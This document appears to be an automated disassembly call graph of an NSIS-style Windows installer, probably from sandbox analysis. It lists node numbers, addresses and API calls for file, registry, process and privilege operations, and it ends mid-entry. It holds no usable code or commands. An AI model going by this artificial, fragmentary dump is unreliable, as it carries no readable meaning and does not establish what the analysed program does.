3679->3680 3680->3656 3681->3643 3682->3671 3683->3642 3685 40422d SendMessageW 3684->3685 3686 4053a6 3685->3686 3689 401389 2 API calls 3686->3689 3690 4053cd 3686->3690 3687 40422d SendMessageW 3688 4053df OleUninitialize 3687->3688 3689->3686 3690->3687 3691 40176f 3692 402c37 18 API calls 3691->3692 3693 401776 3692->3693 3694 401796 3693->3694 3695 40179e 3693->3695 3751 40624c lstrcpynW 3694->3751 3752 40624c lstrcpynW 3695->3752 3698 40179c 3702 4064e0 5 API calls 3698->3702 3699 4017a9 3700 405b1d 3 API calls 3699->3700 3701 4017af lstrcatW 3700->3701 3701->3698 3712 4017bb 3702->3712 3703 40658f 2 API calls 3703->3712 3704 405d19 2 API calls 3704->3712 3706 4017cd CompareFileTime 3706->3712 3707 40188d 3708 4052b0 25 API calls 3707->3708 3711 401897 3708->3711 3709 4052b0 25 API calls 3717 401879 3709->3717 3710 40624c lstrcpynW 3710->3712 3730 4030fa 3711->3730 3712->3703 3712->3704 3712->3706 3712->3707 3712->3710 3718 40626e 18 API calls 3712->3718 3727 401864 3712->3727 3729 405d3e GetFileAttributesW CreateFileW 3712->3729 3753 4058ae 3712->3753 3715 4018be SetFileTime 3716 4018d0 CloseHandle 3715->3716 3716->3717 3719 4018e1 3716->3719 3718->3712 3720 4018e6 3719->3720 3721 4018f9 3719->3721 3722 40626e 18 API calls 3720->3722 3723 40626e 18 API calls 3721->3723 3725 4018ee lstrcatW 3722->3725 3726 401901 3723->3726 3725->3726 3728 4058ae MessageBoxIndirectW 3726->3728 3727->3709 3727->3717 3728->3717 3729->3712 3731 403113 3730->3731 3732 40313e 3731->3732 3768 4032f5 SetFilePointer 3731->3768 3757 4032df 3732->3757 3736 40315b GetTickCount 3747 40316e 3736->3747 3737 40327f 3738 403283 3737->3738 3743 40329b 3737->3743 3740 4032df ReadFile 3738->3740 3739 4018aa 3739->3715 3739->3716 3740->3739 3741 4032df ReadFile 3741->3743 3742 4032df ReadFile 3742->3747 3743->3739 3743->3741 3744 405df0 WriteFile 3743->3744 3744->3743 3746 4031d4 GetTickCount 3746->3747 3747->3739 3747->3742 3747->3746 3748 4031fd MulDiv wsprintfW 3747->3748 3750 405df0 WriteFile 3747->3750 3760 4067a7 3747->3760 3749 4052b0 25 API calls 3748->3749 3749->3747 3750->3747 3751->3698 3752->3699 3754 4058c3 3753->3754 3755 40590f 3754->3755 3756 4058d7 MessageBoxIndirectW 3754->3756 3755->3712 3756->3755 3758 405dc1 ReadFile 3757->3758 3759 403149 3758->3759 3759->3736 3759->3737 3759->3739 3761 4067cc 3760->3761 3762 4067d4 3760->3762 3761->3747 3762->3761 3763 406864 GlobalAlloc 3762->3763 3764 40685b GlobalFree 3762->3764 3766 4068d2 GlobalFree 3762->3766 3767 4068db GlobalAlloc 3762->3767 3763->3761 3765 406878 3763->3765 3764->3763 3765->3762 3766->3767 3767->3761 3767->3762 3768->3732 4326 402570 4327 402c37 18 API calls 4326->4327 4328 402577 4327->4328 4331 405d3e GetFileAttributesW CreateFileW 4328->4331 4330 402583 4331->4330 4332 401b71 4333 401bc2 4332->4333 4334 401b7e 4332->4334 4336 401bc7 4333->4336 4337 401bec GlobalAlloc 4333->4337 4335 4022de 4334->4335 4342 401b95 4334->4342 4339 40626e 18 API calls 4335->4339 4345 401c07 4336->4345 4353 40624c lstrcpynW 4336->4353 4338 40626e 18 API calls 4337->4338 4338->4345 4341 4022eb 4339->4341 4347 4058ae MessageBoxIndirectW 4341->4347 4351 40624c lstrcpynW 4342->4351 4343 401bd9 GlobalFree 4343->4345 4346 401ba4 4352 40624c lstrcpynW 4346->4352 4347->4345 4349 401bb3 4354 40624c lstrcpynW 4349->4354 4351->4346 4352->4349 4353->4343 4354->4345 3769 4024f2 3770 402c77 18 API calls 3769->3770 3771 4024fc 3770->3771 3772 402c15 18 API calls 3771->3772 3773 402505 3772->3773 3774 402521 RegEnumKeyW 3773->3774 3775 40252d RegEnumValueW 3773->3775 3776 402885 3773->3776 3777 402549 RegCloseKey 3774->3777 3775->3777 3778 402542 3775->3778 3777->3776 3778->3777 4355 401a72 4356 402c15 18 API calls 4355->4356 4357 401a78 4356->4357 4358 402c15 18 API calls 4357->4358 4359 401a20 4358->4359 3780 401573 3781 401583 ShowWindow 3780->3781 3782 40158c 3780->3782 3781->3782 3783 40159a ShowWindow 3782->3783 3784 402abf 3782->3784 3783->3784 4360 4042f5 lstrcpynW lstrlenW 4361 4014f5 SetForegroundWindow 4362 402abf 4361->4362 4370 401e77 4371 402c37 18 API calls 4370->4371 4372 401e7d 4371->4372 4373 402c37 18 API calls 4372->4373 4374 401e86 4373->4374 4375 402c37 18 API calls 4374->4375 4376 401e8f 4375->4376 4377 402c37 18 API calls 4376->4377 4378 401e98 4377->4378 4379 401423 25 API calls 4378->4379 4380 401e9f 4379->4380 4387 405874 ShellExecuteExW 4380->4387 4382 401ee1 4383 4066d7 5 API calls 4382->4383 4385 402885 4382->4385 4384 401efb CloseHandle 4383->4384 4384->4385 4387->4382 3807 40167b 3808 402c37 18 API calls 3807->3808 3809 401682 3808->3809 3810 402c37 18 API calls 3809->3810 3811 40168b 3810->3811 3812 402c37 18 API calls 3811->3812 3813 401694 MoveFileW 3812->3813 3814 4016a0 3813->3814 3815 4016a7 3813->3815 3817 401423 25 API calls 3814->3817 3816 40658f 2 API calls 3815->3816 3819 40224a 3815->3819 3818 4016b6 3816->3818 3817->3819 3818->3819 3820 406012 37 API calls 3818->3820 3820->3814 4086 4020fe 4087 402c37 18 API calls 4086->4087 4088 402105 4087->4088 4089 402c37 18 API calls 4088->4089 4090 40210f 4089->4090 4091 402c37 18 API calls 4090->4091 4092 402119 4091->4092 4093 402c37 18 API calls 4092->4093 4094 402123 4093->4094 4095 402c37 18 API calls 4094->4095 4096 40212d 4095->4096 4097 40216c CoCreateInstance 4096->4097 4098 402c37 18 API calls 4096->4098 4101 40218b 4097->4101 4098->4097 4099 401423 25 API calls 4100 40224a 4099->4100 4101->4099 4101->4100 4102 40247e 4103 402c77 18 API calls 4102->4103 4104 402488 4103->4104 4105 402c37 18 API calls 4104->4105 4106 402491 4105->4106 4107 40249c RegQueryValueExW 4106->4107 4112 402885 4106->4112 4108 4024c2 RegCloseKey 4107->4108 4109 4024bc 4107->4109 4108->4112 4109->4108 4113 406193 wsprintfW 4109->4113 4113->4108 4388 40437e 4389 404396 4388->4389 4391 4044b0 4388->4391 4396 4041e1 19 API calls 4389->4396 4390 40451a 4392 4045e4 4390->4392 4393 404524 GetDlgItem 4390->4393 4391->4390 4391->4392 4398 4044eb GetDlgItem SendMessageW 4391->4398 4397 404248 8 API calls 4392->4397 4394 4045a5 4393->4394 4395 40453e 4393->4395 4394->4392 4402 4045b7 4394->4402 4395->4394 4401 404564 SendMessageW LoadCursorW SetCursor 4395->4401 4399 4043fd 4396->4399 4412 4045df 4397->4412 4421 404203 KiUserCallbackDispatcher 4398->4421 4400 4041e1 19 API calls 4399->4400 4404 40440a CheckDlgButton 4400->4404 4422 40462d 4401->4422 4406 4045cd 4402->4406 4407 4045bd SendMessageW 4402->4407 4419 404203 KiUserCallbackDispatcher 4404->4419 4411 4045d3 SendMessageW 4406->4411 4406->4412 4407->4406 4408 404515 4413 404609 SendMessageW 4408->4413 4411->4412 4413->4390 4414 404428 GetDlgItem 4420 404216 SendMessageW 4414->4420 4416 40443e SendMessageW 4417 404464 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4416->4417 4418 40445b GetSysColor 4416->4418 4417->4412 4418->4417 4419->4414 4420->4416 4421->4408 4425 405874 ShellExecuteExW 4422->4425 4424 404593 LoadCursorW SetCursor 4424->4394 4425->4424 4426 4019ff 4427 402c37 18 API calls 4426->4427 4428 401a06 4427->4428 4429 402c37 18 API calls 4428->4429 4430 401a0f 4429->4430 4431 401a16 lstrcmpiW 4430->4431 4432 401a28 lstrcmpW 4430->4432 4433 401a1c 4431->4433 4432->4433 3191 401f00 3206 402c37 3191->3206 3198 402885 3201 401f2b 3202 401f30 3201->3202 3203 401f3b 3201->3203 3231 406193 wsprintfW 3202->3231 3205 401f39 CloseHandle 3203->3205 3205->3198 3207 402c43 3206->3207 3232 40626e 3207->3232 3210 401f06 3212 4052b0 3210->3212 3213 4052cb 3212->3213 3214 401f10 3212->3214 3215 4052e7 lstrlenW 3213->3215 3216 40626e 18 API calls 3213->3216 3223 405831 CreateProcessW 3214->3223 3217 405310 3215->3217 3218 4052f5 lstrlenW 3215->3218 3216->3215 3220 405323 3217->3220 3221 405316 SetWindowTextW 3217->3221 3218->3214 3219 405307 lstrcatW 3218->3219 3219->3217 3220->3214 3222 405329 SendMessageW SendMessageW SendMessageW 3220->3222 3221->3220 3222->3214 3224 401f16 3223->3224 3225 405864 CloseHandle 3223->3225 3224->3198 3224->3205 3226 4066d7 WaitForSingleObject 3224->3226 3225->3224 3227 4066f1 3226->3227 3228 406703 GetExitCodeProcess 3227->3228 3275 406662 3227->3275 3228->3201 3231->3205 3236 40627b 3232->3236 3233 4064c6 3234 402c64 3233->3234 3266 40624c lstrcpynW 3233->3266 3234->3210 3250 4064e0 3234->3250 3236->3233 3237 406494 lstrlenW 3236->3237 3238 40626e 10 API calls 3236->3238 3242 4063a9 GetSystemDirectoryW 3236->3242 3243 4063bc GetWindowsDirectoryW 3236->3243 3244 4064e0 5 API calls 3236->3244 3245 406437 lstrcatW 3236->3245 3246 40626e 10 API calls 3236->3246 3247 4063f0 SHGetSpecialFolderLocation 3236->3247 3248 4063dd SHGetFolderPathW 3236->3248 3259 40611a 3236->3259 3264 406193 wsprintfW 3236->3264 3265 40624c lstrcpynW 3236->3265 3237->3236 3238->3237 3242->3236 3243->3236 3244->3236 3245->3236 3246->3236 3247->3236 3249 406408 SHGetPathFromIDListW CoTaskMemFree 3247->3249 3248->3236 3248->3247 3249->3236 3257 4064ed 3250->3257 3251 406563 3252 406568 CharPrevW 3251->3252 3254 406589 3251->3254 3252->3251 3253 406556 CharNextW 3253->3251 3253->3257 3254->3210 3256 406542 CharNextW 3256->3257 3257->3251 3257->3253 3257->3256 3258 406551 CharNextW 3257->3258 3271 405b4a 3257->3271 3258->3253 3267 4060b9 3259->3267 3262 40617e 3262->3236 3263 40614e RegQueryValueExW RegCloseKey 3263->3262 3264->3236 3265->3236 3266->3234 3268 4060c8 3267->3268 3269 4060d1 RegOpenKeyExW 3268->3269 3270 4060cc 3268->3270 3269->3270 3270->3262 3270->3263 3272 405b50 3271->3272 3273 405b66 3272->3273 3274 405b57 CharNextW 3272->3274 3273->3257 3274->3272 3276 40667f PeekMessageW 3275->3276 3277 406675 DispatchMessageW 3276->3277 3278 40668f WaitForSingleObject 3276->3278 3277->3276 3278->3227 4434 401000 4435 401037 BeginPaint GetClientRect 4434->4435 4436 40100c DefWindowProcW 4434->4436 4438 4010f3 4435->4438 4439 401179 4436->4439 4440 401073 CreateBrushIndirect FillRect DeleteObject 4438->4440 4441 4010fc 4438->4441 4440->4438 4442 401102 CreateFontIndirectW 4441->4442 4443 401167 EndPaint 4441->4443 4442->4443 4444 401112 6 API calls 4442->4444 4443->4439 4444->4443 4445 401503 4446 40150b 4445->4446 4448 40151e 4445->4448 4447 402c15 18 API calls 4446->4447 4447->4448 3478 402306 3479 40230e 3478->3479 3482 402314 3478->3482 3480 402c37 18 API calls 3479->3480 3480->3482 3481 402322 3484 402330 3481->3484 3485 402c37 18 API calls 3481->3485 3482->3481 3483 402c37 18 API calls 3482->3483 3483->3481 3486 402c37 18 API calls 3484->3486 3485->3484 3487 402339 WritePrivateProfileStringW 3486->3487 4449 404a06 4450 404a32 4449->4450 4451 404a16 4449->4451 4453 404a65 4450->4453 4454 404a38 SHGetPathFromIDListW 4450->4454 4460 405892 GetDlgItemTextW 4451->4460 4456 404a4f SendMessageW 4454->4456 4457 404a48 4454->4457 4455 404a23 SendMessageW 4455->4450 4456->4453 4458 40140b 2 API calls 4457->4458 4458->4456 4460->4455 4461 401f86 4462 402c37 18 API calls 4461->4462 4463 401f8d 4462->4463 4464 406626 5 API calls 4463->4464 4465 401f9c 4464->4465 4466 401fb8 GlobalAlloc 4465->4466 4467 402020 4465->4467 4466->4467 4468 401fcc 4466->4468 4469 406626 5 API calls 4468->4469 4470 401fd3 4469->4470 4471 406626 5 API calls 4470->4471 4472 401fdd 4471->4472 4472->4467 4476 406193 wsprintfW 4472->4476 4474 402012 4477 406193 wsprintfW 4474->4477 4476->4474 4477->4467 3495 403d08 3496 403d20 3495->3496 3497 403e5b 3495->3497 3496->3497 3499 403d2c 3496->3499 3498 403e6c GetDlgItem GetDlgItem 3497->3498 3503 403eac 3497->3503 3502 4041e1 19 API calls 3498->3502 3500 403d37 SetWindowPos 3499->3500 3501 403d4a 3499->3501 3500->3501 3505 403d67 3501->3505 3506 403d4f ShowWindow 3501->3506 3507 403e96 SetClassLongW 3502->3507 3504 403f06 3503->3504 3512 401389 2 API calls 3503->3512 3513 403e56 3504->3513 3566 40422d 3504->3566 3509 403d89 3505->3509 3510 403d6f DestroyWindow 3505->3510 3506->3505 3511 40140b 2 API calls 3507->3511 3515 403d8e SetWindowLongW 3509->3515 3516 403d9f 3509->3516 3514 40416a 3510->3514 3511->3503 3517 403ede 3512->3517 3514->3513 3523 40419b ShowWindow 3514->3523 3515->3513 3520 403e48 3516->3520 3521 403dab GetDlgItem 3516->3521 3517->3504 3522 403ee2 SendMessageW 3517->3522 3518 40140b 2 API calls 3535 403f18 3518->3535 3519 40416c DestroyWindow EndDialog 3519->3514 3588 404248 3520->3588 3524 403ddb 3521->3524 3525 403dbe SendMessageW IsWindowEnabled 3521->3525 3522->3513 3523->3513 3528 403de8 3524->3528 3529 403dfb 3524->3529 3530 403e2f SendMessageW 3524->3530 3539 403de0 3524->3539 3525->3513 3525->3524 3527 40626e 18 API calls 3527->3535 3528->3530 3528->3539 3532 403e03 3529->3532 3533 403e18 3529->3533 3530->3520 3582 40140b 3532->3582 3537 40140b 2 API calls 3533->3537 3534 403e16 3534->3520 3535->3513 3535->3518 3535->3519 3535->3527 3538 4041e1 19 API calls 3535->3538 3557 4040ac DestroyWindow 3535->3557 3569 4041e1 3535->3569 3540 403e1f 3537->3540 3538->3535 3585 4041ba 3539->3585 3540->3520 3540->3539 3542 403f93 GetDlgItem 3543 403fb0 ShowWindow KiUserCallbackDispatcher 3542->3543 3544 403fa8 3542->3544 3572 404203 KiUserCallbackDispatcher 3543->3572 3544->3543 3546 403fda EnableWindow 3551 403fee 3546->3551 3547 403ff3 GetSystemMenu EnableMenuItem SendMessageW 3548 404023 SendMessageW 3547->3548 3547->3551 3548->3551 3551->3547 3573 404216 SendMessageW 3551->3573 3574 403ce9 3551->3574 3577 40624c lstrcpynW 3551->3577 3553 404052 lstrlenW 3554 40626e 18 API calls 3553->3554 3555 404068 SetWindowTextW 3554->3555 3578 401389 3555->3578 3557->3514 3558 4040c6 CreateDialogParamW 3557->3558 3558->3514 3559 4040f9 3558->3559 3560 4041e1 19 API calls 3559->3560 3561 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3560->3561 3562 401389 2 API calls 3561->3562 3563 40414a 3562->3563 3563->3513 3564 404152 ShowWindow 3563->3564 3565 40422d SendMessageW 3564->3565 3565->3514 3567 404245 3566->3567 3568 404236 SendMessageW 3566->3568 3567->3535 3568->3567 3570 40626e 18 API calls 3569->3570 3571 4041ec SetDlgItemTextW 3570->3571 3571->3542 3572->3546 3573->3551 3575 40626e 18 API calls 3574->3575 3576 403cf7 SetWindowTextW 3575->3576 3576->3551 3577->3553 3580 401390 3578->3580 3579 4013fe 3579->3535 3580->3579 3581 4013cb MulDiv SendMessageW 3580->3581 3581->3580 3583 401389 2 API calls 3582->3583 3584 401420 3583->3584 3584->3539 3586 4041c1 3585->3586 3587 4041c7 SendMessageW 3585->3587 3586->3587 3587->3534 3589 404260 GetWindowLongW 3588->3589 3599 4042e9 3588->3599 3590 404271 3589->3590 3589->3599 3591 404280 GetSysColor 3590->3591 3592 404283 3590->3592 3591->3592 3593 404293 SetBkMode 3592->3593 3594 404289 SetTextColor 3592->3594 3595 4042b1 3593->3595 3596 4042ab GetSysColor 3593->3596 3594->3593 3597 4042c2 3595->3597 3598 4042b8 SetBkColor 3595->3598 3596->3595 3597->3599 3600 4042d5 DeleteObject 3597->3600 3601 4042dc CreateBrushIndirect 3597->3601 3598->3597 3599->3513 3600->3601 3601->3599 3602 402388 3603 402390 3602->3603 3604 4023bb 3602->3604 3618 402c77 3603->3618 3606 402c37 18 API calls 3604->3606 3608 4023c2 3606->3608 3614 402cf5 3608->3614 3609 4023a1 3611 402c37 18 API calls 3609->3611 3613 4023a8 RegDeleteValueW RegCloseKey 3611->3613 3612 4023cf 3613->3612 3615 402d0b 3614->3615 3617 402d21 3615->3617 3623 402d2a 3615->3623 3617->3612 3619 402c37 18 API calls 3618->3619 3620 402c8e 3619->3620 3621 4060b9 RegOpenKeyExW 3620->3621 3622 402397 3621->3622 3622->3609 3622->3612 3624 4060b9 RegOpenKeyExW 3623->3624 3625 402d58 3624->3625 3626 402dd0 3625->3626 3627 402d5c 3625->3627 3626->3617 3628 402d7e RegEnumKeyW 3627->3628 3629 402d95 RegCloseKey 3627->3629 3630 402db6 RegCloseKey 3627->3630 3632 402d2a 6 API calls 3627->3632 3628->3627 3628->3629 3631 406626 5 API calls 3629->3631 3630->3626 3633 402da5 3631->3633 3632->3627 3634 402dc4 RegDeleteKeyW 3633->3634 3635 402da9 3633->3635 3634->3626 3635->3626 4485 40190c 4486 401943 4485->4486 4487 402c37 18 API calls 4486->4487 4488 401948 4487->4488 4489 40595a 68 API calls 4488->4489 4490 401951 4489->4490 4498 401d0e 4499 402c15 18 API calls 4498->4499 4500 401d15 4499->4500 4501 402c15 18 API calls 4500->4501 4502 401d21 GetDlgItem 4501->4502 4503 40258c 4502->4503 4504 40190f 4505 402c37 18 API calls 4504->4505 4506 401916 4505->4506 4507 4058ae MessageBoxIndirectW 4506->4507 4508 40191f 4507->4508 4509 401491 4510 4052b0 25 API calls 4509->4510 4511 401498 4510->4511 4512 402592 4513 4025c1 4512->4513 4514 4025a6 4512->4514 4516 4025f5 4513->4516 4517 4025c6 4513->4517 4515 402c15 18 API calls 4514->4515 4522 4025ad 4515->4522 4518 402c37 18 API calls 4516->4518 4519 402c37 18 API calls 4517->4519 4520 4025fc lstrlenW 4518->4520 4521 4025cd WideCharToMultiByte lstrlenA 4519->4521 4520->4522 4521->4522 4523 402629 4522->4523 4524 40263f 4522->4524 4526 405e1f 5 API calls 4522->4526 4523->4524 4525 405df0 WriteFile 4523->4525 4525->4524 4526->4523 4534 403918 4535 403923 4534->4535 4536 403927 4535->4536 4537 40392a GlobalAlloc 4535->4537 4537->4536 3785 401c19 3786 402c15 18 API calls 3785->3786 3787 401c20 3786->3787 3788 402c15 18 API calls 3787->3788 3789 401c2d 3788->3789 3790 401c42 3789->3790 3791 402c37 18 API calls 3789->3791 3792 401c52 3790->3792 3793 402c37 18 API calls 3790->3793 3791->3790 3794 401ca9 3792->3794 3795 401c5d 3792->3795 3793->3792 3797 402c37 18 API calls 3794->3797 3796 402c15 18 API calls 3795->3796 3798 401c62 3796->3798 3799 401cae 3797->3799 3800 402c15 18 API calls 3798->3800 3801 402c37 18 API calls 3799->3801 3802 401c6e 3800->3802 3803 401cb7 FindWindowExW 3801->3803 3804 401c99 SendMessageW 3802->3804 3805 401c7b SendMessageTimeoutW 3802->3805 3806 401cd9 3803->3806 3804->3806 3805->3806 4538 402a9a SendMessageW 4539 402ab4 InvalidateRect 4538->4539 4540 402abf 4538->4540 4539->4540 4541 40281b 4542 402821 4541->4542 4543 402829 FindClose 4542->4543 4544 402abf 4542->4544 4543->4544 4545 40149e 4546 4022f1 4545->4546 4547 4014ac PostQuitMessage 4545->4547 4547->4546 4548 4029a2 4549 402c15 18 API calls 4548->4549 4550 4029a8 4549->4550 4551 4029e8 4550->4551 4552 4029cf 4550->4552 4554 402885 4550->4554 4555 402a02 4551->4555 4556 4029f2 4551->4556 4553 4029d4 4552->4553 4561 4029e5 4552->4561 4562 40624c lstrcpynW 4553->4562 4558 40626e 18 API calls 4555->4558 4557 402c15 18 API calls 4556->4557 4557->4561 4558->4561 4561->4554 4563 406193 wsprintfW 4561->4563 4562->4554 4563->4554 3474 4015a3 3475 402c37 18 API calls 3474->3475 3476 4015aa SetFileAttributesW 3475->3476 3477 4015bc 3476->3477 4571 405224 4572 405234 4571->4572 4573 405248 4571->4573 4574 40523a 4572->4574 4583 405291 4572->4583 4575 405250 IsWindowVisible 4573->4575 4579 405267 4573->4579 4577 40422d SendMessageW 4574->4577 4578 40525d 4575->4578 4575->4583 4576 405296 CallWindowProcW 4580 405244 4576->4580 4577->4580 4584 404b7a SendMessageW 4578->4584 4579->4576 4589 404bfa 4579->4589 4583->4576 4585 404bd9 SendMessageW 4584->4585 4586 404b9d GetMessagePos ScreenToClient SendMessageW 4584->4586 4587 404bd1 4585->4587 4586->4587 4588 404bd6 4586->4588 4587->4579 4588->4585 4598 40624c lstrcpynW 4589->4598 4591 404c0d 4599 406193 wsprintfW 4591->4599 4593 404c17 4594 40140b 2 API calls 4593->4594 4595 404c20 4594->4595 4600 40624c lstrcpynW 4595->4600 4597 404c27 4597->4583 4598->4591 4599->4593 4600->4597 4601 4028a7 4602 402c37 18 API calls 4601->4602 4603 4028b5 4602->4603 4604 4028cb 4603->4604 4605 402c37 18 API calls 4603->4605 4606 405d19 2 API calls 4604->4606 4605->4604 4607 4028d1 4606->4607 4629 405d3e GetFileAttributesW CreateFileW 4607->4629 4609 4028de 4610 402981 4609->4610 4611 4028ea GlobalAlloc 4609->4611 4614 402989 DeleteFileW 4610->4614 4615 40299c 4610->4615 4612 402903 4611->4612 4613 402978 CloseHandle 4611->4613 4630 4032f5 SetFilePointer 4612->4630 4613->4610 4614->4615 4617 402909 4618 4032df ReadFile 4617->4618 4619 402912 GlobalAlloc 4618->4619 4620 402922 4619->4620 4621 402956 4619->4621 4623 4030fa 36 API calls 4620->4623 4622 405df0 WriteFile 4621->4622 4624 402962 GlobalFree 4622->4624 4628 40292f 4623->4628 4625 4030fa 36 API calls 4624->4625 4627 402975 4625->4627 4626 40294d GlobalFree 4626->4621 4627->4613 4628->4626 4629->4609 4630->4617 4631 404c2c GetDlgItem GetDlgItem 4632 404c7e 7 API calls 4631->4632 4641 404e97 4631->4641 4633 404d21 DeleteObject 4632->4633 4634 404d14 SendMessageW 4632->4634 4635 404d2a 4633->4635 4634->4633 4636 404d61 4635->4636 4640 40626e 18 API calls 4635->4640 4638 4041e1 19 API calls 4636->4638 4637 404f7b 4639 405027 4637->4639 4643 404e8a 4637->4643 4649 404fd4 SendMessageW 4637->4649 4642 404d75 4638->4642 4644 405031 SendMessageW 4639->4644 4645 405039 4639->4645 4646 404d43 SendMessageW SendMessageW 4640->4646 4641->4637 4647 404b7a 5 API calls 4641->4647 4665 404f08 4641->4665 4648 4041e1 19 API calls 4642->4648 4650 404248 8 API calls 4643->4650 4644->4645 4652 405052 4645->4652 4653 40504b ImageList_Destroy 4645->4653 4660 405062 4645->4660 4646->4635 4647->4665 4666 404d83 4648->4666 4649->4643 4655 404fe9 SendMessageW 4649->4655 4656 40521d 4650->4656 4651 404f6d SendMessageW 4651->4637 4657 40505b GlobalFree 4652->4657 4652->4660 4653->4652 4654 4051d1 4654->4643 4661 4051e3 ShowWindow GetDlgItem ShowWindow 4654->4661 4659 404ffc 4655->4659 4657->4660 4658 404e58 GetWindowLongW SetWindowLongW 4662 404e71 4658->4662 4670 40500d SendMessageW 4659->4670 4660->4654 4674 404bfa 4 API calls 4660->4674 4678 40509d 4660->4678 4661->4643 4663 404e77 ShowWindow 4662->4663 4664 404e8f 4662->4664 4682 404216 SendMessageW 4663->4682 4683 404216 SendMessageW 4664->4683 4665->4637 4665->4651 4666->4658 4669 404dd3 SendMessageW 4666->4669 4671 404e52 4666->4671 4672 404e20 SendMessageW 4666->4672 4673 404e0f SendMessageW 4666->4673 4669->4666 4670->4639 4671->4658 4671->4662 4672->4666 4673->4666 4674->4678 4675 4051a7 InvalidateRect 4675->4654 4676 4051bd 4675->4676 4679 404b35 21 API calls 4676->4679 4677 4050cb SendMessageW 4681 4050e1 4677->4681 4678->4677 4678->4681 4679->4654 4680 405155 SendMessageW SendMessageW 4680->4681 4681->4675 4681->4680 4682->4643 4683->4641 4684 40202c 4685 40203e 4684->4685 4695 4020f0 4684->4695 4686 402c37 18 API calls 4685->4686 4687 402045 4686->4687 4689 402c37 18 API calls 4687->4689 4688 401423 25 API calls 4693 40224a 4688->4693 4690 40204e 4689->4690 4691 402064 LoadLibraryExW 4690->4691 4692 402056 GetModuleHandleW 4690->4692 4694 402075 4691->4694 4691->4695 4692->4691 4692->4694 4704 406695 WideCharToMultiByte 4694->4704 4695->4688 4698 402086 4701 401423 25 API calls 4698->4701 4702 402096 4698->4702 4699 4020bf 4700 4052b0 25 API calls 4699->4700 4700->4702 4701->4702 4702->4693 4703 4020e2 FreeLibrary 4702->4703 4703->4693 4705 402080 4704->4705 4706 4066bf GetProcAddress 4704->4706 4705->4698 4705->4699 4706->4705 4707 40432f lstrlenW 4708 404350 WideCharToMultiByte 4707->4708 4709 40434e 4707->4709 4709->4708 4710 402a2f 4711 402c15 18 API calls 4710->4711 4712 402a35 4711->4712 4713 402a6c 4712->4713 4714 402885 4712->4714 4716 402a47 4712->4716 4713->4714 4715 40626e 18 API calls 4713->4715 4715->4714 4716->4714 4718 406193 wsprintfW 4716->4718 4718->4714 4719 401a30 4720 402c37 18 API calls 4719->4720 4721 401a39 ExpandEnvironmentStringsW 4720->4721 4722 401a4d 4721->4722 4724 401a60 4721->4724 4723 401a52 lstrcmpW 4722->4723 4722->4724 4723->4724 4730 401db3 GetDC 4731 402c15 18 API calls 4730->4731 4732 401dc5 GetDeviceCaps MulDiv ReleaseDC 4731->4732 4733 402c15 18 API calls 4732->4733 4734 401df6 4733->4734 4735 40626e 18 API calls 4734->4735 4736 401e33 CreateFontIndirectW 4735->4736 4737 40258c 4736->4737 4738 401735 4739 402c37 18 API calls 4738->4739 4740 40173c SearchPathW 4739->4740 4741 401757 4740->4741 4742 402835 4743 40283d 4742->4743 4744 402841 FindNextFileW 4743->4744 4747 402853 4743->4747 4745 40289a 4744->4745 4744->4747 4748 40624c lstrcpynW 4745->4748 4748->4747 4749 4014b8 4750 4014be 4749->4750 4751 401389 2 API calls 4750->4751 4752 4014c6 4751->4752 3831 40333d SetErrorMode GetVersion 3832 40337c 3831->3832 3833 403382 3831->3833 3834 406626 5 API calls 3832->3834 3835 4065b6 3 API calls 3833->3835 3834->3833 3836 403398 lstrlenA 3835->3836 3836->3833 3837 4033a8 3836->3837 3838 406626 5 API calls 3837->3838 3839 4033af 3838->3839 3840 406626 5 API calls 3839->3840 3841 4033b6 3840->3841 3842 406626 5 API calls 3841->3842 3843 4033c2 #17 OleInitialize SHGetFileInfoW 3842->3843 3922 40624c lstrcpynW 3843->3922 3846 40340e GetCommandLineW 3923 40624c lstrcpynW 3846->3923 3848 403420 GetModuleHandleW 3849 403438 3848->3849 3850 405b4a CharNextW 3849->3850 3851 403447 CharNextW 3850->3851 3852 403571 GetTempPathW 3851->3852 3862 403460 3851->3862 3924 40330c 3852->3924 3854 403589 3855 4035e3 DeleteFileW 3854->3855 3856 40358d GetWindowsDirectoryW lstrcatW 3854->3856 3934 402ec1 GetTickCount GetModuleFileNameW 3855->3934 3857 40330c 12 API calls 3856->3857 3860 4035a9 3857->3860 3858 405b4a CharNextW 3858->3862 3860->3855 3863 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3860->3863 3861 4035f7 3869 405b4a CharNextW 3861->3869 3906 40369a 3861->3906 3917 4036aa 3861->3917 3862->3858 3865 40355c 3862->3865 3867 40355a 3862->3867 3866 40330c 12 API calls 3863->3866 4018 40624c lstrcpynW 3865->4018 3872 4035db 3866->3872 3867->3852 3873 403616 3869->3873 3872->3855 3872->3917 3880 403674 3873->3880 3881 4036da 3873->3881 3874 4037e4 3877 4037ec GetCurrentProcess OpenProcessToken 3874->3877 3878 403868 ExitProcess 3874->3878 3875 4036c4 3876 4058ae MessageBoxIndirectW 3875->3876 3882 4036d2 ExitProcess 3876->3882 3883 403804 LookupPrivilegeValueW AdjustTokenPrivileges 3877->3883 3884 403838 3877->3884 3885 405c25 18 API calls 3880->3885 3886 405819 5 API calls 3881->3886 3883->3884 3887 406626 5 API calls 3884->3887 3888 403680 3885->3888 3889 4036df lstrcatW 3886->3889 3890 40383f 3887->3890 3888->3917 4019 40624c lstrcpynW 3888->4019 3892 4036f0 lstrcatW 3889->3892 3893 4036fb lstrcatW lstrcmpiW 3889->3893 3891 403854 ExitWindowsEx 3890->3891 3894 403861 3890->3894 3891->3878 3891->3894 3892->3893 3896 403717 3893->3896 3893->3917 3897 40140b 2 API calls 3894->3897 3899 403723 3896->3899 3900 40371c 3896->3900 3897->3878 3898 40368f 4020 40624c lstrcpynW 3898->4020 3902 4057fc 2 API calls 3899->3902 3901 40577f 4 API calls 3900->3901 3904 403721 3901->3904 3905 403728 SetCurrentDirectoryW 3902->3905 3904->3905 3907 403743 3905->3907 3908 403738 3905->3908 3962 40395a 3906->3962 4029 40624c lstrcpynW 3907->4029 4028 40624c lstrcpynW 3908->4028 3911 40626e 18 API calls 3912 403782 DeleteFileW 3911->3912 3913 40378f CopyFileW 3912->3913 3919 403751 3912->3919 3913->3919 3914 4037d8 3915 406012 37 API calls 3914->3915 3915->3917 3916 406012 37 API calls 3916->3919 4021 403880 3917->4021 3918 40626e 18 API calls 3918->3919 3919->3911 3919->3914 3919->3916 3919->3918 3920 405831 2 API 